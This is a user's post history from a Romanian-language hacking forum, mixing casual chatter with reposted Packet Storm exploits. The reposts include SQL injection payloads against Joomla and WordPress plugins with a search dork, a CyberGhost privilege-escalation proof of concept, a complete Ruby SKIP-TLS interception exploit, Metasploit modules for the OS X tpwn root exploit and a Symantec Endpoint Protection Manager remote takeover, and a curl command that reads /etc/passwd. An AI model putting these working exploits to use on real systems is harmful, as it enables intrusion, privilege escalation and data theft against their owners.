-
Posts
245 -
Joined
-
Last visited
-
Days Won
1
Posts posted by KhiZaRix
-
-
2 hours ago, sentinel said:
Tu vrei sa faci social engineering
Eram in tranzit prin Slatina.
Eram sigur =))) am stat ceva timp prin Slatina.
-
Joomla FocalPoint component version 1.2.3 suffers from a remote SQL injection vulnerability.
# Exploit Title: Joomla Component FocalPoint 1.2.3 - SQL Injection # Date: 2017-03-23 # Home : https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/focalpoint/ # Exploit Author: Persian Hack Team # Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com) # Home : http://persian-team.ir/ # Google Dork : inurl:index.php?option=com_focalpoint # Telegram Channel AND Demo: @PersianHackTeam # Tested on: WIN # POC : id Parameter Vulnerable to SQL Injection Put a String Value in id Parameter http://www.target.com/index.php?option=com_focalpoint&view=location&id=[SQL]&Itemid=135 # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members # Iranian White Hat Hackers
Sursa/Source: https://packetstormsecurity.com/files/141793/Joomla-FocalPoint-1.2.3-SQL-Injection.html
-
On 01.03.2017 at 9:30 AM, sentinel said:
Prin ce oraș? pare ff cunoscut
-
10 minutes ago, Clopotel said:
Si eu sunt curios, daca se poate sa-mi explici si mie, as aprecia.
okay , cand se termină , adică Joi , vă contactez și vă explic.
-
Stegano 0.6.9
Changes: Introduces some type hints (PEP 484). More tests for the generators and for the tools module. Updated descriptions of generators. Fixed a bug with a generator that has been previously renamed.
Download: https://packetstormsecurity.com/files/download/141598/Stegano-0.6.9.tar.gz
- 1
-
1 minute ago, kznamst said:
Salut, imi cer scuze ca ma bag asa, dar am tot vazut de multe ori astfel de challenge-uri si niciodata nu mi-am dat seama "cu ce se mananca". Dupa ce se inchie acest challenge, poti sa faci un topic cu modul de abordare al unui challange de acest tip? Cred ca mai sunt multi ca mine care ar dori sa afle. Multumesc foarte mult.
Salut , am să te contactez pe private și am să-ți explic.
- 1
-
CODE :
# # # # # # Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection # Google Dork: N/A # Date: 09.03.2017 # Vendor Homepage: https://www.apptha.com/ # Software: https://www.apptha.com/category/extension/Wordpress/PICA-Photo-Gallery # Demo: http://www.apptha.com/demo/pica-photo-gallery # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/?aid=[SQL] # For example; # -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+- # wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users # Etc.. # # # # #
Source/Sursa: https://packetstormsecurity.com/files/141533/WordPress-PICA-Photo-Gallery-1.0-SQL-Injection.html
-
Stegano is a basic Python Steganography module. Stegano implements two methods of hiding: using the red portion of a pixel to hide ASCII messages, and using the Least Significant Bit (LSB) technique. It is possible to use a more advanced LSB method based on integers sets. The sets (Sieve of Eratosthenes, Fermat, Carmichael numbers, etc.) are used to select the pixels used to hide the information.
Changes: Fixed an error when revealing a hidden binary file in an image.
Download: https://packetstormsecurity.com/files/download/141562/Stegano-0.6.8.tar.gz
Source: https://packetstormsecurity.com/files/141562/Stegano-0.6.8.html
- 1
-
WordPress version 4.5.3 Audio Playlist suffers from a cross site scripting vulnerability.
CODE:
------------------------------------------------------------------------ WordPress audio playlist functionality is affected by Cross-Site Scripting ------------------------------------------------------------------------ Yorick Koster, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ Two Cross-Site Scripting vulnerabilities exists in the playlist functionality of WordPress. These issues can be exploited by convincing an Editor or Administrator into uploading a malicious MP3 file. Once uploaded the issues can be triggered by a Contributor or higher using the playlist shortcode. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160717-0003 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on the WordPress version 4.5.3. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ These issues are resolved in WordPress version 4.7.3. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html It was discovered that meta information (ID3) stored in audio files are not properly sanitized in case they are uploaded by a user with the unfiltered_html (generally an Editor or Administrator). The first Cross-Site Scripting vulnerability exists in the function that processes the playlist shortcode, which is done in the wp_playlist_shortcode() method (/wp-includes/media.php). This method creates a <noscript> block for users with JavaScript disabled. The method wp_get_attachment_link() does not perform any output encoding on the link text. Meta information from the audio file is used in the link text, rendering wp_playlist_shortcode() vulnerable to Cross-Site Scripting. The second Cross-Site Scripting issue is DOM-based and exists in the JavaScript file /wp-includes/js/mediaelement/wp-playlist.js (or /wp-includes/js/mediaelement/wp-playlist.min.js). The WPPlaylistView object is used to render a audio player client side. The method renderTracks() uses the meta information from the audio file in a call to jQuery's append() method. No output encoding is used on the meta information, resulting in a Cross-Site Scripting vulnerability. Proof of concept The following MP3 file can be used to reproduce this issue: https://securify.nl/advisory/SFY20160742/xss.mp3 1) upload MP3 file to the Media Library (as Editor or Administrator). 2) Insert an Audio Playlist in a Post containing this MP3 (Create Audio Playlist). ------------------------------------------------------------------------ Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way.
Sursa/Source: https://packetstormsecurity.com/files/141491/WordPress-4.5.3-Audio-Playlist-Cross-Site-Scripting.html
- 1
-
# Exploit CyberGhost 6.0.4.2205 Privilege Escalation # Date: 06.03.2017 # Software Link: http://www.cyberghostvpn.com/ # Exploit Author: Kacper Szurek # Contact: https://twitter.com/KacperSzurek # Website: https://security.szurek.pl/ # Category: local 1. Description `CG6Service` service has method `SetPeLauncherState` which allows launch the debugger automatically for every process we want. https://security.szurek.pl/cyberghost-6042205-privilege-escalation.html 2. Proof of Concept using System; using CyberGhost.Communication; namespace cyber { class Program { static void Main(string[] args) { Console.WriteLine("CyberGhost 6.0.4.2205 Privilege Escalation"); Console.WriteLine("by Kacper Szurek"); Console.WriteLine("http://security.szurek.pl/"); Console.WriteLine("https://twitter.com/KacperSzurek"); PeLauncherOptions options = new PeLauncherOptions(); options.ExecuteableName = "sethc.exe"; options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe"; EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe"); CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add); Console.WriteLine("Now logout and then press SHIFT key 5 times"); } } }
Sursa/Source: https://packetstormsecurity.com/files/141455/CyberGhost-6.0.4.2205-Privilege-Escalation.html
- 1
-
Welcome then? ... lol?
-
@NickyRo Din cate știam Ardamaxu era bun. Doar că ți-aș recomanda să nu te joci cu focul.
Și referitor la email, nu ți-aș recomanda pe email, ci un panel ceva.
-
https://gyazo.com/55dca29bc0759fe726411422c1062bf5
Nu prea mult cu vorbe goale , doar puțină bătaie de cap.
Mi-a luat aproximativ o oră să fac tot / testez.
Diff: Moderat
Reward: 404
HINT: Razele de lumină au fost oprite de către Caesar.
Pentru mici HINT-uri, PM
Succes.
Se termină pe : 16.03.2017
Au rezolvat:
#1 @u0m3
#2 @Usr6
#3 @new_luca
#4 @Hertz
- 3
-
Nice bind ( really dude? ).
-
Java Secure Socket Extension (JSSE) SKIP-TLS exploit that has been tested on JDK 8u25 and 7u72. This is a stand-alone ruby exploit and does not require Metasploit.
#!/usr/bin/env ruby
# encoding: ASCII-8BIT
# By Ramon de C Valle. This work is dedicated to the public domain.
require 'openssl'
require 'optparse'
require 'socket'
Version = [0, 0, 1]
Release = nil
def prf(secret, label, seed)
if secret.empty?
s1 = s2 = ''
else
length = ((secret.length * 1.0) / 2).ceil
s1 = secret[0..(length - 1)]
s2 = secret[(length - 1)..(secret.length - 1)]
end
hmac_md5 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('md5'), s1, label + seed)
hmac_md5 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('md5'), s1, hmac_md5 + label + seed)
hmac_sha1 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), s2, label + seed)
hmac_sha1 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), s2, hmac_sha1 + label + seed)
result = ''
[hmac_md5.length, hmac_sha1.length].max.times { |i| result << [(hmac_md5.getbyte(i) || 0) ^ (hmac_sha1.getbyte(i) || 0)].pack('C') }
result
end
def prf_sha256(secret, label, seed)
hmac_sha256 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), secret, label + seed)
OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), secret, hmac_sha256 + label + seed)
end
class String
def hexdump(stream=$stdout)
0.step(bytesize - 1, 16) do |i|
stream.printf('%08x ', i)
0.upto(15) do |j|
stream.printf(' ') if j == 8
if i + j >= bytesize
stream.printf(' ')
else
stream.printf('%02x ', getbyte(i + j))
end
end
stream.printf(' ')
0.upto(15) do |j|
if i + j >= bytesize
stream.printf(' ')
else
if /[[:print:]]/ === getbyte(i + j).chr && /[^[:space:]]/ === getbyte(i + j).chr
stream.printf('%c', getbyte(i + j))
else
stream.printf('.')
end
end
end
stream.printf("\n")
end
end
end
options = {}
OptionParser.new do |parser|
parser.banner = "Usage: #{parser.program_name} [options] host"
parser.separator('')
parser.separator('Options:')
parser.on('-H', '--local-host HOST', 'Local host') do |host|
options[:local_host] = host
end
parser.on('-P', '--local-port PORT', 'Local port') do |port|
options[:local_port] = port
end
parser.on('-d', '--debug', 'Debug mode') do
options[:debug] = true
end
parser.on('-h', '--help', 'Show this message') do
puts parser
exit
end
parser.on('-o', '--output FILE', 'Output file') do |file|
options[:file] = File.new(file, 'w+b')
end
parser.on('-p', '--port PORT', 'Port') do |port|
options[:port] = port
end
parser.on('-v', '--verbose', 'Verbose mode') do
options[:verbose] = true
end
parser.on('--version', 'Show version') do
puts parser.ver
exit
end
end.parse!
local_host = options[:local_host] || '0.0.0.0'
local_port = options[:local_port] || 443
debug = options[:debug] || false
file = options[:file] || nil
host = ARGV[0] or fail ArgumentError, 'no host given'
port = options[:port] || 443
verbose = options[:verbose] || false
proxy = TCPServer.new(local_host, local_port)
puts 'Listening on %s:%d' % [proxy.addr[2], proxy.addr[1]] if debug || verbose
loop do
Thread.start(proxy.accept) do |client|
puts 'Accepted connection from %s:%d' % [client.peeraddr[2], client.peeraddr[1]] if debug || verbose
finished_sent = false
handshake_messages = ''
version = ''
context = OpenSSL::SSL::SSLContext.new(:TLSv1)
context.verify_mode = OpenSSL::SSL::VERIFY_NONE
tcp_socket = TCPSocket.new(host, port)
ssl_server = OpenSSL::SSL::SSLSocket.new(tcp_socket, context)
ssl_server.connect
puts 'Connected to %s:%d' % [ssl_server.peeraddr[2], ssl_server.peeraddr[1]] if debug || verbose
server = TCPSocket.new(host, port)
puts 'Connected to %s:%d' % [server.peeraddr[2], server.peeraddr[1]] if debug || verbose
loop do
readable, = IO.select([client, server])
readable.each do |r|
if r == ssl_server
# ssl_server is an SSL socket; read application data directly
header = ''
fragment = r.readpartial(4096)
fragment.hexdump($stderr) if debug
puts '%d bytes received' % [fragment.bytesize] if debug || verbose
else
header = r.read(5)
raise EOFError if header.nil?
header.hexdump($stderr) if debug
puts '%d bytes received' % [header.bytesize] if debug || verbose
fragment = r.read(header[3, 2].unpack('n')[0])
fragment.hexdump($stderr) if debug
puts '%d bytes received' % [fragment.bytesize] if debug || verbose
end
if finished_sent
if file
# Save application data
file.write(fragment)
file.flush
file.fsync
end
elsif fragment =~ /^\x0e\x00\x00\x00/ # server_hello_done
# Drop the server hello done message and send the finished
# message in plaintext.
if header[2, 1] == "\x03"
verify_data = prf_sha256('', 'server finished', OpenSSL::Digest::SHA256.digest(handshake_messages))
verify_data = verify_data[0, 12]
else
verify_data = prf('', 'server finished', OpenSSL::Digest::MD5.digest(handshake_messages) + OpenSSL::Digest::SHA1.digest(handshake_messages))
verify_data = verify_data[0, 12]
end
finished = "\x14#{[verify_data.length].pack('N')[1, 3]}#{verify_data}"
record = header[0, 3] + [finished.length].pack('n') + finished
count = client.write(record)
client.flush
record.hexdump($stderr) if debug
puts '%d bytes sent' % [count] if debug || verbose
finished_sent = true
# Change to the SSL socket
server.close
server = ssl_server
# Save version used in the handshake
version = header[2, 1]
next
else
# Save handshake messages
handshake_messages << fragment
end
case r
when client
if finished_sent
# server is an SSL socket
count = server.write(fragment)
server.flush
fragment.hexdump($stderr) if debug
puts '%d bytes sent' % [count] if debug || verbose
else
# server isn't an SSL socket
record = header + fragment
count = server.write(record)
server.flush
record.hexdump($stderr) if debug
puts '%d bytes sent' % [count] if debug || verbose
end
when ssl_server
# client isn't an SSL socket; add the record layer header with
# the same version used in the handshake.
header = "\x17\x03#{version}" + [fragment.length].pack('n')
record = header + fragment
count = client.write(record)
client.flush
record.hexdump($stderr) if debug
puts '%d bytes sent' % [count] if debug || verbose
when server
record = header + fragment
count = client.write(record)
client.flush
record.hexdump($stderr) if debug
puts '%d bytes sent' % [count] if debug || verbose
end
end
end
client.close
server.close
end
end
proxy.closeSource: https://dl.packetstormsecurity.net/1511-exploits/rcvalle_skiptls.rb.txt
-
?tiu c? nu prea mai am activitate ?i i really dont give a single fuck , but bro , dac? postezi un program de Hax0r Bruteforce de SSH specific? ?i tu mai multe (versiuni protocoale ?i etc.. ) , nu arunci un link ?i gata... , un scan ceva, în fine, nu recomand bruteforce de pe windows , mai ales dac? windowsul este pe pc-ul t?u
Edit:// din câte am v?zut nu l-ai testat, prietene înainte s? arunci ceva testeaz?, nu arunci pe forum orice gunoi. nu m? considera hater dar asta este..
-
227 Exploits from August 2015
Source + Download : https://packetstormsecurity.com/files/download/133393/1508-exploits.tgz
-
Dac? este mare lenea de citit, d?-i un scroll pana jos la surs?.
Author: Todd Whiteman
Issue Date: 28th April, 2010
Version: 2.0.1
Compatibility: Requires Python 2.2 or higher, an older Python 1.5.2 compatible module can be found in the CVS source.
Download ( Unix/PC ) = http://twhiteman.netfirms.com/pyDES/pyDes-2.0.1.tar.gz / http://twhiteman.netfirms.com/pyDES/pyDes-2.0.1.zip
About pyDES
This is a pure python implementation of the DES encryption algorithm. It is in pure python to avoid portability issues, since most DES implementations are programmed in C (for performance reasons).
Triple DES class is also implemented, utilising the DES base. Triple DES is either DES-EDE3 with a 24 byte key, or DES-EDE2 with a 16 byte key. See the "About triple DES" section below more info on this algorithm.
The code below is not written for speed or performance, so not for those needing a fast des implementation, but rather a handy portable solution ideal for small usage. It takes my AMD2000+ machine 1 second per 2.5 kilobyte to encrypt or decrypt using the DES method. Thats very SLOW!!About triple DES
Triple DES is just running the DES algorithm 3 times over the data with the specified key. The supplied key is split up into 3 parts, each part being 8 bytes long (the mandatory key size for DES).
The triple DES algorithm uses the DES-EDE3 method when a 24 byte key is supplied. This means there are three DES operations in the sequence encrypt-decrypt-encrypt with the three different keys. The first key will be bytes 1 to 8, the second key bytes 9 to 16 and the third key bytes 17 to 24.
If a 16 byte key is supplied instead, the triple DES method used will be DES-EDE2. This means there are three DES operations in the sequence encrypt-decrypt-encrypt, but the first and third operations use the same key. The first/third key will be bytes 1 to 8 and the second key bytes 9 to 16.Installation
1 Extract the files from the pyDes archive.
2 Run the following command: python setup.py install
3 To test, run: python test_pydes.py
Note: On Unix, you'd run this command from a shell prompt; on Windows, you have to open a command prompt window (``DOS box'') and do it there;
pyDes Usage
Class initialization
--------------------
pyDes.des(key, [mode], [IV], [pad], [padmode])
pyDes.triple_des(key, [mode], [IV], [pad], [padmode])
key -> Bytes containing the encryption key. 8 bytes for DES, 16 or 24 bytes
for Triple DES
mode -> Optional argument for encryption type, can be either
pyDes.ECB (Electronic Code Book) or pyDes.CBC (Cypher Block Chaining)
IV -> Optional Initial Value bytes, must be supplied if using CBC mode.
Length must be 8 bytes.
pad -> Optional argument, set the pad character (PAD_NORMAL) to use during
all encrypt/decrpt operations done with this instance.
padmode -> Optional argument, set the padding mode (PAD_NORMAL or PAD_PKCS5)
to use during all encrypt/decrpt operations done with this instance.
I recommend to use PAD_PKCS5 padding, as then you never need to worry about any
padding issues, as the padding can be removed unambiguously upon decrypting
data that was encrypted using PAD_PKCS5 padmode.
Common methods
--------------
encrypt(data, [pad], [padmode])
decrypt(data, [pad], [padmode])
data -> Bytes to be encrypted/decrypted
pad -> Optional argument. Only when using padmode of PAD_NORMAL. For
encryption, adds this characters to the end of the data block when
data is not a multiple of 8 bytes. For decryption, will remove the
trailing characters that match this pad character from the last 8
bytes of the unencrypted data block.
padmode -> Optional argument, set the padding mode, must be one of PAD_NORMAL
or PAD_PKCS5). Defaults to PAD_NORMAL.
Example
-------
from pyDes import *
# For Python3, you'll need to use bytes, i.e.:
# data = b"Please encrypt my data"
# k = des(b"DESCRYPT", CBC, b"\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)
data = "Please encrypt my data"
k = des("DESCRYPT", CBC, "\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)
d = k.encrypt(data)
print "Encrypted: %r" % d
print "Decrypted: %r" % k.decrypt(d)
assert k.decrypt(d, padmode=PAD_PKCS5) == dataSources : pyDes - Pure Python DES encryption algorithm / pyDES download | SourceForge.net
Credits
Thanks go to:
David Broadwell for his ideas, comments and suggestions.
Mario Wolff for finding errors in triple des CBC.
Santiago Palladino for enlightening me on the PKCS5 padding technique.
Shaya for correcting the PAD_PKCS5 triple des CBC errors.
Yoav Aner for spotting a triple des CBC IV error.Thanks go to:
David Broadwell for his ideas, comments and suggestions.
Mario Wolff for finding errors in triple des CBC.
Santiago Palladino for enlightening me on the PKCS5 padding technique.
Shaya for correcting the PAD_PKCS5 triple des CBC errors.
Yoav Aner for spotting a triple des CBC IV error. -
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::OSX::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Mac OS X "tpwn" Privilege Escalation',
'Description' => %q{
This module exploits a null pointer dereference in XNU to escalate
privileges to root.
Tested on 10.10.4 and 10.10.5.
},
'Author' => [
'qwertyoruiop', # Vulnerability discovery and PoC
'wvu' # Copy/paste monkey
],
'References' => [
['URL', 'https://github.com/kpwn/tpwn']
],
'DisclosureDate' => 'Aug 16 2015',
'License' => MSF_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_X86_64,
'SessionTypes' => ['shell'],
'Privileged' => true,
'Targets' => [
['Mac OS X 10.10.4-10.10.5', {}]
],
'DefaultTarget' => 0
))
register_options([
OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
])
end
def check
ver?? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe
end
def exploit
print_status("Writing exploit to `#{exploit_file}'")
write_file(exploit_file, binary_exploit)
register_file_for_cleanup(exploit_file)
print_status("Writing payload to `#{payload_file}'")
write_file(payload_file, binary_payload)
register_file_for_cleanup(payload_file)
print_status('Executing exploit...')
cmd_exec(sploit)
print_status('Executing payload...')
cmd_exec(payload_file)
end
def ver?
Gem::Version.new(get_sysinfo['ProductVersion']).between?(
Gem::Version.new('10.10.4'), Gem::Version.new('10.10.5')
)
end
def sploit
"chmod +x #{exploit_file} #{payload_file} && #{exploit_file}"
end
def binary_exploit
File.read(File.join(
Msf::Config.data_directory, 'exploits', 'tpwn', 'tpwn'
))
end
def binary_payload
Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
end
def exploit_file
@Exploit_file ||=
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
end
def payload_file
@payload_file ||=
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
end
endSursa > https://dl.packetstormsecurity.net/1508-exploits/tpwn.rb.txt
-
##
# This module requires Metasploit: [url=http://metasploit.com/download]Penetration Testing Tool, Metasploit, Free Download | Rapid7[/url]
# Current source: [url]https://github.com/rapid7/metasploit-framework[/url]
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',
'Description' => %q{
This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities
include an authentication bypass, a directory traversal and a privilege escalation to
get privileged code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Markus Wulftange', #discovery
'bperry' # metasploit module
],
'References' =>
[
['CVE', '2015-1486'],
['CVE', '2015-1487'],
['CVE', '2015-1489'],
['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
],
'DefaultOptions' => {
'SSL' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic',
{
'Arch' => ARCH_X86,
'Payload' => {
'DisableNops' => true
}
}
],
],
'Privileged' => true,
'DisclosureDate' => 'Jul 31 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8443),
OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
], self.class)
end
def exploit
meterp = Rex::Text.rand_text_alpha(10)
jsp = Rex::Text.rand_text_alpha(10)
print_status("#{peer} - Getting cookie...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
'vars_post' => {
'ActionType' => 'ResetPassword',
'UserID' => 'admin',
'Domain' => ''
}
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")
end
cookie = res.get_cookies
if cookie.nil? || cookie.empty?
fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")
end
exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
}
print_status("#{peer} - Uploading payload...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
'vars_get' => {
'ActionType' => 'BinaryFile',
'Action' => 'UploadPackage',
'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe",
'KnownHosts' => '.'
},
'data' => payload.encoded_exe,
'cookie' => cookie,
'ctype' => ''
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
end
register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")
print_status("#{peer} - Uploading JSP page to execute the payload...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
'vars_get' => {
'ActionType' => 'BinaryFile',
'Action' => 'UploadPackage',
'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp",
'KnownHosts' => '.'
},
'data' => exec,
'cookie' => cookie,
'ctype' => ''
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
end
register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")
print_status("#{peer} - Executing payload. Manual cleanup will be required.")
send_request_cgi({
'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
}, 5)
end
endSource: https://dl.packetstormsecurity.net/1508-exploits/sepm_auth_bypass_rce.rb.txt
- 1
-
Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: Image Export plugin can help you selectively download images uploaded by an administrator .
Vulnerability:
The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only. And line 8 attempts to
unlink the file after being downloaded. This script could be used to delete files out of the wordpress directory if file permissions allow.
1 <?php
2 if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
3 $file = $_GET['file'];
4
5 header( 'Content-Type: application/zip' );
6 header( 'Content-Disposition: attachment; filename="' . $file . '"' );
7 readfile( $file );
8 unlink( $file );
9
10 exit;
11 }
12 ?>
CVEID: TBD
Exploit Code:
• $ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Screen Shots:
Advisory: http://www.vapid.dhs.org/advisory.php?v=135Source: https://dl.packetstormsecurity.net/1507-exploits/wpimageexport-download.txt
-
Gyazo - 0041a9f7e6035d2461f7b1c0820cbd05.png
Pân? la urm? o fii bine ce o f?cut ?i @Aerosol, c? ?i a?a era mult? agita?ie cu anti-aerosol (hateri) sau alte c?caturi, cum ar fi luatul la mi?to ?i cuno?tin?ele lui, c? mul?i zic c? nu ?tie, c? nu face, c? nu ?tiu ce ... pân? la urm? înva?? omul( nu ?in cu nimeni doar o p?rere ).
-
Serialepenet ? cumva?
-
Salut pu?tiule , s? nu mergi pe partea gre?it? cu floodul nici nu am citit tot ?i totu?i mi-a s?rit în ochi ( IP ) , vezi ce faci pe skype, Bine ai venit, sper sa înve?i lucruri bune de aici
Interviu cu Alex
in Bine ai venit
Posted
Bine ai venit , like la prezentare.